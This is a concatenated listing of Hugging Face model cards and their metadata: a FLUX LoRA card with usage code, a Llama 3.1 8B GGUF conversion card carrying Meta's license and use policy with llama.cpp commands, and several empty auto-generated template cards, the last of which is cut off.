month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
BootesVoid/cmbneknhk01zkekg0qkny5ki7_cmbp5djla002613bspo66xg1e | BootesVoid | 2025-06-09T14:15:36Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-06-09T14:15:35Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: JASMIN
---
# Cmbneknhk01Zkekg0Qkny5Ki7_Cmbp5Djla002613Bspo66Xg1E
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `JASMIN` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "JASMIN",
"lora_weights": "https://huggingface.co/BootesVoid/cmbneknhk01zkekg0qkny5ki7_cmbp5djla002613bspo66xg1e/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('BootesVoid/cmbneknhk01zkekg0qkny5ki7_cmbp5djla002613bspo66xg1e', weight_name='lora.safetensors')
image = pipeline('JASMIN').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/BootesVoid/cmbneknhk01zkekg0qkny5ki7_cmbp5djla002613bspo66xg1e/discussions) to add images that show off what you’ve made with this LoRA.
|
elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF | elichen-skymizer | 2025-06-09T14:06:30Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"facebook",
"meta",
"pytorch",
"llama",
"llama-3",
"llama-cpp",
"gguf-my-repo",
"text-generation",
"en",
"de",
"fr",
"it",
"pt",
"hi",
"es",
"th",
"base_model:meta-llama/Llama-3.1-8B",
"base_model:quantized:meta-llama/Llama-3.1-8B",
"license:llama3.1",... | text-generation | 2025-06-09T14:05:57Z | ---
language:
- en
- de
- fr
- it
- pt
- hi
- es
- th
pipeline_tag: text-generation
tags:
- facebook
- meta
- pytorch
- llama
- llama-3
- llama-cpp
- gguf-my-repo
license: llama3.1
extra_gated_prompt: "### LLAMA 3.1 COMMUNITY LICENSE AGREEMENT\nLlama 3.1 Version\
\ Release Date: July 23, 2024\n\"Agreement\" means the terms and conditions for\
\ use, reproduction, distribution and modification of the Llama Materials set forth\
\ herein.\n\"Documentation\" means the specifications, manuals and documentation\
\ accompanying Llama 3.1 distributed by Meta at https://llama.meta.com/doc/overview.\n\
\"Licensee\" or \"you\" means you, or your employer or any other person or entity\
\ (if you are entering into this Agreement on such person or entity’s behalf), of\
\ the age required under applicable laws, rules or regulations to provide legal\
\ consent and that has legal authority to bind your employer or such other person\
\ or entity if you are entering in this Agreement on their behalf.\n\"Llama 3.1\"\
\ means the foundational large language models and software and algorithms, including\
\ machine-learning model code, trained model weights, inference-enabling code, training-enabling\
\ code, fine-tuning enabling code and other elements of the foregoing distributed\
\ by Meta at https://llama.meta.com/llama-downloads.\n\"Llama Materials\" means,\
\ collectively, Meta’s proprietary Llama 3.1 and Documentation (and any portion\
\ thereof) made available under this Agreement.\n\"Meta\" or \"we\" means Meta Platforms\
\ Ireland Limited (if you are located in or, if you are an entity, your principal\
\ place of business is in the EEA or Switzerland) and Meta Platforms, Inc. (if you\
\ are located outside of the EEA or Switzerland).\n \n1. License Rights and Redistribution.\n\
a. Grant of Rights. You are granted a non-exclusive, worldwide, non-transferable\
\ and royalty-free limited license under Meta’s intellectual property or other rights\
\ owned by Meta embodied in the Llama Materials to use, reproduce, distribute, copy,\
\ create derivative works of, and make modifications to the Llama Materials.\nb.\
\ Redistribution and Use.\ni. If you distribute or make available the Llama Materials\
\ (or any derivative works thereof), or a product or service (including another\
\ AI model) that contains any of them, you shall (A) provide a copy of this Agreement\
\ with any such Llama Materials; and (B) prominently display “Built with Llama”\
\ on a related website, user interface, blogpost, about page, or product documentation.\
\ If you use the Llama Materials or any outputs or results of the Llama Materials\
\ to create, train, fine tune, or otherwise improve an AI model, which is distributed\
\ or made available, you shall also include “Llama” at the beginning of any such\
\ AI model name.\nii. If you receive Llama Materials, or any derivative works thereof,\
\ from a Licensee as part of an integrated end user product, then Section 2 of\
\ this Agreement will not apply to you.\niii. You must retain in all copies of the\
\ Llama Materials that you distribute the following attribution notice within a\
\ “Notice” text file distributed as a part of such copies: “Llama 3.1 is licensed\
\ under the Llama 3.1 Community License, Copyright © Meta Platforms, Inc. All Rights\
\ Reserved.”\niv. Your use of the Llama Materials must comply with applicable laws\
\ and regulations (including trade compliance laws and regulations) and adhere to\
\ the Acceptable Use Policy for the Llama Materials (available at https://llama.meta.com/llama3_1/use-policy),\
\ which is hereby incorporated by reference into this Agreement.\n2. Additional\
\ Commercial Terms. If, on the Llama 3.1 version release date, the monthly active\
\ users of the products or services made available by or for Licensee, or Licensee’s\
\ affiliates, is greater than 700 million monthly active users in the preceding\
\ calendar month, you must request a license from Meta, which Meta may grant to\
\ you in its sole discretion, and you are not authorized to exercise any of the\
\ rights under this Agreement unless or until Meta otherwise expressly grants you\
\ such rights.\n3. Disclaimer of Warranty. UNLESS REQUIRED BY APPLICABLE LAW, THE\
\ LLAMA MATERIALS AND ANY OUTPUT AND RESULTS THEREFROM ARE PROVIDED ON AN “AS IS”\
\ BASIS, WITHOUT WARRANTIES OF ANY KIND, AND META DISCLAIMS ALL WARRANTIES OF ANY\
\ KIND, BOTH EXPRESS AND IMPLIED, INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES\
\ OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE.\
\ YOU ARE SOLELY RESPONSIBLE FOR DETERMINING THE APPROPRIATENESS OF USING OR REDISTRIBUTING\
\ THE LLAMA MATERIALS AND ASSUME ANY RISKS ASSOCIATED WITH YOUR USE OF THE LLAMA\
\ MATERIALS AND ANY OUTPUT AND RESULTS.\n4. Limitation of Liability. IN NO EVENT\
\ WILL META OR ITS AFFILIATES BE LIABLE UNDER ANY THEORY OF LIABILITY, WHETHER IN\
\ CONTRACT, TORT, NEGLIGENCE, PRODUCTS LIABILITY, OR OTHERWISE, ARISING OUT OF THIS\
\ AGREEMENT, FOR ANY LOST PROFITS OR ANY INDIRECT, SPECIAL, CONSEQUENTIAL, INCIDENTAL,\
\ EXEMPLARY OR PUNITIVE DAMAGES, EVEN IF META OR ITS AFFILIATES HAVE BEEN ADVISED\
\ OF THE POSSIBILITY OF ANY OF THE FOREGOING.\n5. Intellectual Property.\na. No\
\ trademark licenses are granted under this Agreement, and in connection with the\
\ Llama Materials, neither Meta nor Licensee may use any name or mark owned by or\
\ associated with the other or any of its affiliates, except as required for reasonable\
\ and customary use in describing and redistributing the Llama Materials or as set\
\ forth in this Section 5(a). Meta hereby grants you a license to use “Llama” (the\
\ “Mark”) solely as required to comply with the last sentence of Section 1.b.i.\
\ You will comply with Meta’s brand guidelines (currently accessible at https://about.meta.com/brand/resources/meta/company-brand/\
\ ). All goodwill arising out of your use of the Mark will inure to the benefit\
\ of Meta.\nb. Subject to Meta’s ownership of Llama Materials and derivatives made\
\ by or for Meta, with respect to any derivative works and modifications of the\
\ Llama Materials that are made by you, as between you and Meta, you are and will\
\ be the owner of such derivative works and modifications.\nc. If you institute\
\ litigation or other proceedings against Meta or any entity (including a cross-claim\
\ or counterclaim in a lawsuit) alleging that the Llama Materials or Llama 3.1 outputs\
\ or results, or any portion of any of the foregoing, constitutes infringement of\
\ intellectual property or other rights owned or licensable by you, then any licenses\
\ granted to you under this Agreement shall terminate as of the date such litigation\
\ or claim is filed or instituted. You will indemnify and hold harmless Meta from\
\ and against any claim by any third party arising out of or related to your use\
\ or distribution of the Llama Materials.\n6. Term and Termination. The term of\
\ this Agreement will commence upon your acceptance of this Agreement or access\
\ to the Llama Materials and will continue in full force and effect until terminated\
\ in accordance with the terms and conditions herein. Meta may terminate this Agreement\
\ if you are in breach of any term or condition of this Agreement. Upon termination\
\ of this Agreement, you shall delete and cease use of the Llama Materials. Sections\
\ 3, 4 and 7 shall survive the termination of this Agreement.\n7. Governing Law\
\ and Jurisdiction. This Agreement will be governed and construed under the laws\
\ of the State of California without regard to choice of law principles, and the\
\ UN Convention on Contracts for the International Sale of Goods does not apply\
\ to this Agreement. The courts of California shall have exclusive jurisdiction\
\ of any dispute arising out of this Agreement.\n### Llama 3.1 Acceptable Use Policy\n\
Meta is committed to promoting safe and fair use of its tools and features, including\
\ Llama 3.1. If you access or use Llama 3.1, you agree to this Acceptable Use Policy\
\ (“Policy”). The most recent copy of this policy can be found at [https://llama.meta.com/llama3_1/use-policy](https://llama.meta.com/llama3_1/use-policy)\n\
#### Prohibited Uses\nWe want everyone to use Llama 3.1 safely and responsibly.\
\ You agree you will not use, or allow others to use, Llama 3.1 to:\n 1. Violate\
\ the law or others’ rights, including to:\n 1. Engage in, promote, generate,\
\ contribute to, encourage, plan, incite, or further illegal or unlawful activity\
\ or content, such as:\n 1. Violence or terrorism\n 2. Exploitation\
\ or harm to children, including the solicitation, creation, acquisition, or dissemination\
\ of child exploitative content or failure to report Child Sexual Abuse Material\n\
\ 3. Human trafficking, exploitation, and sexual violence\n 4. The\
\ illegal distribution of information or materials to minors, including obscene\
\ materials, or failure to employ legally required age-gating in connection with\
\ such information or materials.\n 5. Sexual solicitation\n 6. Any\
\ other criminal activity\n 3. Engage in, promote, incite, or facilitate the\
\ harassment, abuse, threatening, or bullying of individuals or groups of individuals\n\
\ 4. Engage in, promote, incite, or facilitate discrimination or other unlawful\
\ or harmful conduct in the provision of employment, employment benefits, credit,\
\ housing, other economic benefits, or other essential goods and services\n 5.\
\ Engage in the unauthorized or unlicensed practice of any profession including,\
\ but not limited to, financial, legal, medical/health, or related professional\
\ practices\n 6. Collect, process, disclose, generate, or infer health, demographic,\
\ or other sensitive personal or private information about individuals without rights\
\ and consents required by applicable laws\n 7. Engage in or facilitate any action\
\ or generate any content that infringes, misappropriates, or otherwise violates\
\ any third-party rights, including the outputs or results of any products or services\
\ using the Llama Materials\n 8. Create, generate, or facilitate the creation\
\ of malicious code, malware, computer viruses or do anything else that could disable,\
\ overburden, interfere with or impair the proper working, integrity, operation\
\ or appearance of a website or computer system\n2. Engage in, promote, incite,\
\ facilitate, or assist in the planning or development of activities that present\
\ a risk of death or bodily harm to individuals, including use of Llama 3.1 related\
\ to the following:\n 1. Military, warfare, nuclear industries or applications,\
\ espionage, use for materials or activities that are subject to the International\
\ Traffic Arms Regulations (ITAR) maintained by the United States Department of\
\ State\n 2. Guns and illegal weapons (including weapon development)\n 3.\
\ Illegal drugs and regulated/controlled substances\n 4. Operation of critical\
\ infrastructure, transportation technologies, or heavy machinery\n 5. Self-harm\
\ or harm to others, including suicide, cutting, and eating disorders\n 6. Any\
\ content intended to incite or promote violence, abuse, or any infliction of bodily\
\ harm to an individual\n3. Intentionally deceive or mislead others, including use\
\ of Llama 3.1 related to the following:\n 1. Generating, promoting, or furthering\
\ fraud or the creation or promotion of disinformation\n 2. Generating, promoting,\
\ or furthering defamatory content, including the creation of defamatory statements,\
\ images, or other content\n 3. Generating, promoting, or further distributing\
\ spam\n 4. Impersonating another individual without consent, authorization,\
\ or legal right\n 5. Representing that the use of Llama 3.1 or outputs are human-generated\n\
\ 6. Generating or facilitating false online engagement, including fake reviews\
\ and other means of fake online engagement\n4. Fail to appropriately disclose to\
\ end users any known dangers of your AI system\nPlease report any violation of\
\ this Policy, software “bug,” or other problems that could lead to a violation\
\ of this Policy through one of the following means:\n * Reporting issues with\
\ the model: [https://github.com/meta-llama/llama-models/issues](https://github.com/meta-llama/llama-models/issues)\n\
\ * Reporting risky content generated by the model:\n developers.facebook.com/llama_output_feedback\n\
\ * Reporting bugs and security concerns: facebook.com/whitehat/info\n * Reporting\
\ violations of the Acceptable Use Policy or unlicensed uses of Meta Llama 3: LlamaUseReport@meta.com"
extra_gated_fields:
First Name: text
Last Name: text
Date of birth: date_picker
Country: country
Affiliation: text
Job title:
type: select
options:
- Student
- Research Graduate
- AI researcher
- AI developer/engineer
- Reporter
- Other
geo: ip_location
? By clicking Submit below I accept the terms of the license and acknowledge that
the information I provide will be collected stored processed and shared in accordance
with the Meta Privacy Policy
: checkbox
extra_gated_description: The information you provide will be collected, stored, processed
and shared in accordance with the [Meta Privacy Policy](https://www.facebook.com/privacy/policy/).
extra_gated_button_content: Submit
library_name: transformers
base_model: meta-llama/Llama-3.1-8B
---
# elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF
This model was converted to GGUF format from [`meta-llama/Llama-3.1-8B`](https://huggingface.co/meta-llama/Llama-3.1-8B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/meta-llama/Llama-3.1-8B) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF --hf-file llama-3.1-8b-q6_k.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF --hf-file llama-3.1-8b-q6_k.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF --hf-file llama-3.1-8b-q6_k.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo elichen-skymizer/Llama-3.1-8B-Q6_K-GGUF --hf-file llama-3.1-8b-q6_k.gguf -c 2048
```
|
MoroM02/0.6B_dpo_run_logs_1ep_fd500 | MoroM02 | 2025-06-09T14:06:11Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T14:04:48Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
aledm03/new_MCQA_no_code_v2_b128_lr5e-06_neft5_200 | aledm03 | 2025-06-09T14:04:51Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T14:03:29Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Treza12/BioMistral-invasive-FULL | Treza12 | 2025-06-09T14:04:06Z | 51 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"8-bit",
"region:us"
] | text-generation | 2025-06-07T10:51:20Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
reza-rgb/M3_attempt_hh_rlhf | reza-rgb | 2025-06-09T13:52:24Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T13:50:48Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
